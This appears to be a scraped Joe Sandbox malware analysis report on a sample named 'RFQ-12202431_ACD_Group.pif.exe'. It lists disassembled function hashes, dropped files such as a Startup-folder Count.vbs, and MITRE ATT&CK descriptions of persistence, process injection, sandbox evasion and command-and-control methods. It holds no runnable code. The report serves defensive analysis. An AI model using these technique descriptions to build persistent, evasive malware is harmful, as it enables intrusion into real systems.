Function 061E6D42 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260e2e7b013ccd66f28aa78443298cd8a04edcba6d0cb819f1800a6d0b37b35c
Instruction ID: 7a3b79bc18f4c50bac6e4cdcd7a516b2c5267c0d39ac7cf262f0a1f60a856cd9
Opcode Fuzzy Hash: 260e2e7b013ccd66f28aa78443298cd8a04edcba6d0cb819f1800a6d0b37b35c
Instruction Fuzzy Hash: 58D0EA78E043289FDBA4CF24E995B99BBB1AF56300F1094D9A44DA3260DB705AC8CF42

Function 061DCE6B Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0e36336ae4c753b2e8799249dc32f252d6967763b567ed421efb300782a4e64
Instruction ID: 36fc6eb7124f73f818ac296e963a394541f4856de6f7937ccb4dfd08e93711ff
Opcode Fuzzy Hash: a0e36336ae4c753b2e8799249dc32f252d6967763b567ed421efb300782a4e64
Instruction Fuzzy Hash: 18A0023F45144185DAB0FA30CC589896BB8BFA01407D81858C0A141115D63665464550

Non-executed Functions

Function 061DB9F0 Relevance: 7.7, Strings: 6, Instructions: 157COMMON

Download Yara Rule

Strings

4'^q, xrefs: 061DBB3A
4'^q, xrefs: 061DBA74
4'^q, xrefs: 061DBAA4
4'^q, xrefs: 061DBAC2
pbq, xrefs: 061DBB47
(bq, xrefs: 061DBBBA

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: ce5cf311e8f1815a5f3ee8ae8d5790c4c7c171a25fe60d2ac0c102f1693d13dc
Instruction ID: e3d38bcba6660eea81cbc0009f3ae974d7d6f082accbdc5029ac73390015cb55
Opcode Fuzzy Hash: ce5cf311e8f1815a5f3ee8ae8d5790c4c7c171a25fe60d2ac0c102f1693d13dc
Instruction Fuzzy Hash: 7E51A170A402098FC748DB7D89506AFBBE7BFC8300F148968D44A9B3A9DF35994687A1

Analysis Process: InstallUtil.exePID: 1460, Parent PID: 2580COMMON

Executed Functions

Function 00E323D2 Relevance: 1.6, Strings: 1, Instructions: 342COMMON

Download Yara Rule

Strings

Deq, xrefs: 00E3246F

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: 1718755a81377ef3f9be36d5bb2eb6835f1e2e645e3d1e8c76b66f6daf390261
Instruction ID: 75f57b4fc0e4d072d3a4708469d73f34c3b70215ac2a63e69ca3dc4107b7082e
Opcode Fuzzy Hash: 1718755a81377ef3f9be36d5bb2eb6835f1e2e645e3d1e8c76b66f6daf390261
Instruction Fuzzy Hash: A9D10274A106409FC715DF28D458A9ABFF2FF89710F1581AED546AB3A2DB35EC02CB81

Function 00E31D18 Relevance: 1.5, Strings: 1, Instructions: 226COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00E31E9C

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: c3605189ae0892e44e9f620a31fddff343f90bd168950d20b01f082f4ec08243
Instruction ID: 5027362486fb9902146d1bf7d4e3f013b8e219b93e1691ec670a5262a6180e81
Opcode Fuzzy Hash: c3605189ae0892e44e9f620a31fddff343f90bd168950d20b01f082f4ec08243
Instruction Fuzzy Hash: 2D917734B11104CFDB44DB65E89CBA97BF2FF88315F2590A9E106AB365CB749C89CB00

Function 00E31D28 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

Te^q, xrefs: 00E31E9C

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: c36f1a8a518a3c36594d7a03153a7a96c64c0409049e55278adbde0e653b190d
Instruction ID: 59716b002efbce81f23b0ed038372889fd3efa65300dc82cc0405d40c2650b04
Opcode Fuzzy Hash: c36f1a8a518a3c36594d7a03153a7a96c64c0409049e55278adbde0e653b190d
Instruction Fuzzy Hash: 61916734B11104CFDB44DB65E89CBA97BF2FF88315F2594A9E106AB365CB749C89CB00

Function 00E31B90 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f6fa7c54ec9230553bb0824ec2a869a0f8d6847850c5867933269762733ecde
Instruction ID: 698ed268d9049e857060a01a03f1d3ebd59deb9fdde5515a557c1402c2c2934b
Opcode Fuzzy Hash: 6f6fa7c54ec9230553bb0824ec2a869a0f8d6847850c5867933269762733ecde
Instruction Fuzzy Hash: 3031AF343442008FD704DB29D958BBABBE2EB84354F1590FAE505DBBA4EA74DC46CB40

Function 00E31AB2 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e5fa488beeade1b3f94392166c633da5784fd83ab92e165a3648864d1993d0
Instruction ID: b07db04a672b62f0bb2d56cd139f3715896ba3070b55bbec29eff9a544085c3d
Opcode Fuzzy Hash: 00e5fa488beeade1b3f94392166c633da5784fd83ab92e165a3648864d1993d0
Instruction Fuzzy Hash: 83110370E05608EFDB40EFA9D1887ADBFF1EB84345F2080EED006A7251E7745A89DB01

Function 00E31AC0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9a2779ea55a1f7115989beed2662da4d96d7c317befa8ff20e1ab031bd32a74
Instruction ID: af6d4994bedfbe340af28e044df2b8d69f1e7a64d7ea887b896529439258221c
Opcode Fuzzy Hash: d9a2779ea55a1f7115989beed2662da4d96d7c317befa8ff20e1ab031bd32a74
Instruction Fuzzy Hash: 0E110570E05208EFDB40EFA9D5887ADBFF1EB84305F2090EAD005A7211E7745A85DB00

Function 00E30902 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55cd879c1537115889c47d62c08e461d703ce00df22f0f8baab46a049952c3a6
Instruction ID: ecdb1767d647b391fc7166d0feec49a163acce19b18653def6ed461c652bb9ca
Opcode Fuzzy Hash: 55cd879c1537115889c47d62c08e461d703ce00df22f0f8baab46a049952c3a6
Instruction Fuzzy Hash: B9E09292F5D2D08BC702523414BC3C46F70AB2304AF1982EE898A8A193979A104B9723

Function 00E3199F Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b761b9342de8edee24bd6144f9cd9be7c4e22d1cbdeff7548d6f64517a09d57
Instruction ID: 9bfdb2a3d149783c89d43c8ae943d4ea185ab4f4d6f55916e040432d4b4f13f4
Opcode Fuzzy Hash: 3b761b9342de8edee24bd6144f9cd9be7c4e22d1cbdeff7548d6f64517a09d57
Instruction Fuzzy Hash: 38E067B9A9AF805FD7170B64ADB93A53FB5DBA6105F0A00EB9546CB1F3DD180C068711

Function 00E31A2A Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd801add01eefd8c872bcd24f2da622f1d3bc4f558b7f4382ffe7194ab2baeb
Instruction ID: cc7fbd9fd6587a262a171de55bf0cbed8a88579d475dc1c56a61a947401a8054
Opcode Fuzzy Hash: 8cd801add01eefd8c872bcd24f2da622f1d3bc4f558b7f4382ffe7194ab2baeb
Instruction Fuzzy Hash: 27D05E51A0D7D04FCF0753B0656C3182EA19B9230AF0D00DFC1828F1F3DD190805D322

Function 00E33E32 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814a2ef29bc1f6495dd715192683f81e9d39f2dbc0ec0b6ea0636c21cd3ff8d1
Instruction ID: 45373e668419974fc9eaf200e3e966bbd5801a0082df8df5ca0d899c0ab43de2
Opcode Fuzzy Hash: 814a2ef29bc1f6495dd715192683f81e9d39f2dbc0ec0b6ea0636c21cd3ff8d1
Instruction Fuzzy Hash: 8CC00236E944589BDB055AA8ED189ED7AF3FB88201F105526F612722A5CA214C14AA10

Function 00E319C8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dbd33b81143dc5b1a60b3b0324cd3af0d9eaf5f21b691fcef77f74c7ef6685a
Instruction ID: c261ae39ba2754fd04c4b85d9028994cb33b51fa3d278b3b576e8a3fa6a4ab60
Opcode Fuzzy Hash: 7dbd33b81143dc5b1a60b3b0324cd3af0d9eaf5f21b691fcef77f74c7ef6685a
Instruction Fuzzy Hash: 74A01130080A08CB82222BA0BF8E0283BACEA002023880022A00E8A0328E2828008B82

Function 00E30950 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2182586766.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_e30000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac22ba56791cfe5ee689647c57e9b5e48eb6c0c58c5573909c716ed43a7b2342
Instruction ID: 96045426c31a096f774cb7c0192ed75f3add9ef3a5e6747791dba3cf5434185b
Opcode Fuzzy Hash: ac22ba56791cfe5ee689647c57e9b5e48eb6c0c58c5573909c716ed43a7b2342
Instruction Fuzzy Hash: 26900232084A0C8B454427957909996775CB5495267854052A50D425115F95646245D5

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ-12202431_ACD_Group.pif.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

C:\Users\user\AppData\Roaming\Count.exe

C:\Users\user\AppData\Roaming\Count.exe:Zone.Identifier

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
RFQ-12202431_ACD_Group.pif.exe

Function 068150A8 Relevance: 6.0, Strings: 4, Instructions: 983
COMMON

Function 06817468 Relevance: 3.8, Strings: 2, Instructions: 1341
COMMON

Function 068F7F90 Relevance: 3.1, Strings: 2, Instructions: 639
COMMON

Function 06B00040 Relevance: 3.1, Strings: 2, Instructions: 616
COMMON

Function 06B00013 Relevance: 2.7, Strings: 2, Instructions: 181
COMMON

Function 068FA730 Relevance: 4.2, Strings: 3, Instructions: 478
COMMON

Function 068FC3E8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Function 068F8811 Relevance: 3.9, Strings: 3, Instructions: 180
COMMON

Function 068429D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre